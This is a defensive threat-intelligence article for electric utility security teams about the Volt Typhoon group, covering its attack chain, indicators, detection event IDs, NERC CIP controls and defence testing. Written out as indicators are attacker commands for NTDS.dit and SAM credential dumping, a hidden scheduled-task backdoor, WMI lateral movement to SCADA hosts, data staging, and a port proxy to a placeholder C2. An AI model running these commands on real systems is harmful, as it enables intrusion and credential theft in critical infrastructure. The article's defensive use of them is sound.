Volt Typhoon has maintained undetected access to multiple electrical utilities for years, with the Massachusetts-based Littleton Electric Light and Water Departments (LELWD) breach serving as a wake-up call. The Chinese state-sponsored group remained in LELWD's operational technology network for 300 days, exfiltrating SCADA configurations and grid topology data before detection—intelligence specifically designed to enable cascading blackouts during geopolitical crises. Recent CISA analysis reveals even more concerning patterns: in some environments, Volt Typhoon has maintained persistent access for at least five years.

This article delivers evidence-based defensive strategies specifically tailored for electrical utility security teams facing this unprecedented threat. Most successful intrusions exploit unpatched edge devices and VPNs without multi-factor authentication.

The Threat Profile

Organizational Structure and Attribution

Volt Typhoon operates as a People’s Liberation Army (PLA) Cyberspace Force unit, conducting pre-positioning operations since at least 2019. Named after a Pacific typhoon designation, the group exclusively targets critical infrastructure with a focus on disruption rather than espionage.

What we know from CISA, NSA, and Five Eyes reporting:

Organizational Hierarchy

• Parent Organization: People’s Liberation Army (PLA) Cyberspace Force, established in 2015 as part of China’s military reforms
• Operational Hours: Activity patterns align with Beijing timezone (UTC+8), with peaks during Chinese business hours
• Development Artifacts: Code comments and debugging information exclusively in Simplified Chinese
• Infrastructure: Leverages Chinese domestic hosting providers for initial staging, then pivots through compromised global infrastructure

The group operates under multiple names depending on the security vendor: AKA Volt Typhoon (Microsoft designation), Vanguard Panda (CrowdStrike), BRONZE SILHOUETTE (Secureworks), Dev-0391 (Microsoft’s previous designation), UNC3236 (Mandiant), Insidious Taurus (Unit 42).

Strategic Motivations

Unlike profit-driven ransomware operators or intelligence-gathering APTs, Volt Typhoon’s mission aligns with Chinese military doctrine:

Primary Objectives are pre-positioning for wartime operations, specifically - creating leverage for Taiwan Strait crisis scenarios, deterring U.S. military intervention in Pacific conflicts, and demonstrating ability to impose costs on U.S. civilian population

Doctrinal Basis - Their targeting directly maps to Chinese military writings on “System Destruction Warfare”, which emphasizes

• Attacking critical nodes that cascade across systems
• Timing attacks for maximum psychological impact
• Creating domestic pressure to limit U.S. military options

Target Selection Logic

• The focus on utilities isn’t random since Chinese military doctrine specifically identifies power grids as the foundation enabling all other critical infrastructure. Water systems (secondary target) create immediate humanitarian pressure.

Operational Characteristics

What makes Volt Typhoon unique is their patience and operational discipline. Unlike cybercrime actors wanting quick payoff, this team has:

• No Financial Motivation - they’ve never deployed ransomware or sold access
• No Data Theft for Espionage - they collect operational data only to understand systems for future disruption
• Extreme Patience - five-year dwell times indicate strategic rather than tactical objectives
• Limited Activity - after achieving persistence, they often go dormant for months, only periodically refreshing credentials

The human operators behind Volt Typhoon remain unnamed in public intelligence, as China’s military cyber units maintain strict operational security. But the group’s consistent tactics, techniques, and procedures (TTPs) suggest a stable, professional team with formal military training rather than loosely affiliated hackers.

The Volt Typhoon advanced persistent threat emerged publicly in May 2023 when Microsoft and the Five Eyes intelligence alliance jointly exposed their five-year campaign against U.S. critical infrastructure. Despite FBI disruption operations and over 30% of vulnerable routers being cleaned in January 2024, the group immediately rebuilt their infrastructure and continues active operations. They've confirmed access to utilities serving populations from 15,000 to major metropolitan areas.

Attack Chain Analysis

They gain initial access through unpatched VPN devices like CVE-2022-42475 (Fortinet FortiGate), CVE-2024-21887 (Ivanti Connect Secure), and end-of-life Cisco RV320/325 routers.

Once inside, they exclusively use legitimate Windows administration tools—PowerShell, WMI, and RDP—making detection nearly impossible without comprehensive logging. Their expanded LOTL toolkit includes:

• Core tools: cmd, certutil, dnscmd, ldifde, makecab, net user/group/use, netsh, nltest, netstat, ntdsutil, ping, PowerShell, quser, reg query/reg save, systeminfo, tasklist, wevtutil, whoami, wmic, xcopy
• Specialized reconnaissance: They steal domain controller backups using ntdsutil.exe, harvest stored credentials from PuTTY profiles containing substation connections, then establish persistence through scheduled tasks mimicking Windows Update
• Critical browser targeting pattern: Volt Typhoon specifically accesses Chrome credential stores:
  • C:\Users\{user}\AppData\Local\Google\Chrome\User Data\Local State (AES keys)
  • C:\Users\{user}\AppData\Local\Google\Chrome\User Data\Default\Login Data

Aand they stage exfiltration data in predictable locations:

• C:\Windows\Temp\tmp\Active Directory\
• C:\Users\Public\pro\
• C:\Windows\Temp\tmp\registry\

Their KV Botnet compromised 30% of internet-exposed small office routers in 37 days, converting them into proxy infrastructure. They specifically target the IT/OT boundary, exfiltrating relay configurations, SCADA system data, and emergency response procedures. Demands aren't financial—they seek sustained access for future activation during Taiwan contingency operations projected for 2027.

The concerning news is that traditional security tools fail against living-off-the-land techniques since every action appears legitimate. However, CISA's February 2024 advisory provides specific detection techniques that have proven effective.

Technical Indicators

1. Initial Access Vectors (most intrusions)

# Common exploitation targets
CVE-2022-42475 - Fortinet FortiOS heap overflow
CVE-2024-21887 - Ivanti Connect Secure command injection  
CVE-2023-46805 - Ivanti authentication bypass
End-of-Life: Cisco RV320/325, Netgear ProSAFE

2. Living-Off-The-Land Commands

# Common PowerShell reconnaissance pattern
Get-EventLog security -instanceid 4624 -after [date] | fl * | Out-File ‘C:\users\public\documents\user.dat’
Get-ADDomain | Select-Object DomainControllers
Get-ADComputer -Filter {OperatingSystem -like “*Server*”}
Get-NetTCPConnection | Where-Object {$_.State -eq “Listen”}
# Credential harvesting
ntdsutil “activate instance ntds” “ifm” “create full C:\temp” quit quit
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

# Persistence mechanisms
schtasks /create /tn “Windows Update” /tr “powershell.exe -w hidden -c IEX” /sc daily /ru SYSTEM

3. Network Movement Patterns

# Lateral movement via WMI
wmic /node:SCADA-HMI process call create "cmd.exe /c powershell.exe"

# Data staging for exfiltration
7z.exe a -pPASSWORD archive.7z \\OT-Network\SCADA\*.conf
certutil -encode archive.7z archive.txt

# Proxy establishment through compromised routers
netsh interface portproxy add v4tov4 listenport=443 connectaddress=<C2>


4. Critical Windows Event IDs for Detection

Application Logs

• Event ID 216: Database location change from normal NTDS.dit path to shadow copy
• Event ID 325: New database creation in C:\Windows\Temp\tmp\Active Directory\ntds.dit
• Event ID 326: NTDS.dit mounting from volume shadow copy process
• Event ID 327: Database detachment (credential dumping completion)
• Event ID 637: New flush map file creation for NTDS.dit operations

Security/System Logs

• Event ID 1102: Security log cleared (immediate investigation required)
• Event ID 4624: Successful logon events (monitor for patterns)

RDP Logs

• Event ID 21: RDP session logon succeeded
• Event ID 22: Shell start notification (new RDP session)
• Event ID 25: Session reconnection

NERC CIP Alignment

The NERC CIP-005-7 standard mandates four critical controls that directly counter Volt Typhoon tactics:

Electronic Security Perimeter (R1)

Identify and protect all access points to Bulk Electric System (BES) Cyber Systems. Review every external connection, validate business justification, and implement deny-by-default rules.

Interactive Remote Access (R2)

Multi-factor authentication for all remote access to high/medium impact systems. Hardware tokens or certificate-based authentication only—SMS and app-based MFA remain vulnerable to phishing.

Vendor Remote Access Management (R2.3)

Monitor and control vendor access in real-time. Volt Typhoon specifically targets MSP connections like the LELWD breach through their Fortinet provider.

System Logging (CIP-007-6 R4)

Generate logs for all authentication attempts and administrative actions. Forward to SIEM within 15 minutes, retain for 90 days minimum.

Quick Defensive Actions

Easy-ish

• Enable PowerShell logging
  • Set-ItemProperty -Path “HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging” -Name “EnableScriptBlockLogging” -Value 1

• Monitor for NTDS extraction attempts
  • Get-WinEvent -FilterHashtable @{LogName=’Application’;ID=216,325,326,327} | Where-Object {$_.Message -like “*ntds*”}
• Deploy Sysmon for enhanced visibility
  • sysmon64 -accepteula -i sysmonconfig-export.xml

More involved but free-ish

• Deploy Wazuh open-source SIEM
  • wget -O - https://packages.wazuh.com/key.asc | apt-key add -
  • apt-get install wazuh-manager
  • /var/ossec/bin/wazuh-control --enable-cis-benchmark
• Firewalled network segmentation
  • - OT_NETWORK: 10.10.0.0/16 (No internet access) - DMZ_NETWORK: 10.20.0.0/16 (Historian, HMI) - IT_NETWORK: 10.30.0.0/16 (Business systems)

Testing Your Defenses

• Use AtomicRedTeam to test

# Core techniques
Invoke-AtomicTest T1087.001 -TestNumbers 1,2,3  # Local Account Discovery (net user, quser)
Invoke-AtomicTest T1003.003 -TestNumbers 1      # NTDS.dit extraction
Invoke-AtomicTest T1003.001 -TestNumbers 1      # LSASS Memory dumping (they use comsvcs.dll)
Invoke-AtomicTest T1654 -TestNumbers 1           # Log Enumeration (confirmed)
Invoke-AtomicTest T1059.001 -TestNumbers 1,2    # PowerShell execution
Invoke-AtomicTest T1047 -TestNumbers 1           # WMI execution
Invoke-AtomicTest T1070.001 -TestNumbers 1      # Clear Windows Event Logs
Invoke-AtomicTest T1057 -TestNumbers 1           # Process Discovery (tasklist /v)
Invoke-AtomicTest T1012 -TestNumbers 1           # Query Registry (PuTTY sessions)
Invoke-AtomicTest T1555.003 -TestNumbers 1      # Credentials from Web Browsers

# Network-based tests
Invoke-AtomicTest T1021.001 -TestNumbers 1      # RDP for lateral movement
Invoke-AtomicTest T1046 -TestNumbers 1           # Network Service Discovery

# Test network segmentation
nmap -sS -p 445,3389,22,23 <ot network>/24       # Should fail from IT network

Canary Deployments

• Use Thinkst Canaries
  • Registry settings
  • Password files

Recovery Planning Assumptions

The December 2024 Dragos report confirms Volt Typhoon maintains access to multiple U.S. grids simultaneously. Recent analysis shows dwell times extending to five years or more. Plan for scenarios where:

• Attackers possess Domain Admin privileges for 300+ days
• Primary and backup domain controllers are compromised
• Adversary understands your grid topology better than junior operators
• Multiple utilities face simultaneous attacks during geopolitical crisis
• Normal communication channels (email, VoIP) are unavailable
• Browser-stored credentials for critical systems are compromised

Reality Check

The electrical utility threat from Chinese pre-positioning operations is active, persistent, and specifically targeting organizations exactly like yours. The Littleton Electric incident demonstrates both the feasibility of long-term persistent access and the intelligence value of operational technology data.

Driving up costs for the Volt Typhoon actors can be achieved with some disciplined implementation of authentication controls, network segmentation, comprehensive logging, and offline backups.

• Chrome credential store monitoring
• Known staging directory surveillance
• Free tools like gait Zeek extension for proxy detection
• Comprehensive PowerShell and WMI logging
• Open source SEIM solutions such as Wazuh and Zeek
• Application Log monitoring (Events 216, 325, 326, 327, 637)

The convergence of NERC CIP requirements and proven defensive techniques provides a prescriptive roadmap. Every control in the CIP-005-7 standard directly counters observed Volt Typhoon tactics.

Granted, nation state actors typically achieve their goals. See Micken’s classic “This World of Ours” paper discussing real-world threat models.

Implement fundamental controls before geopolitical events activate pre-positioned access. With focused effort on the fundamentals outlined here, you can achieve that with your budget and resources.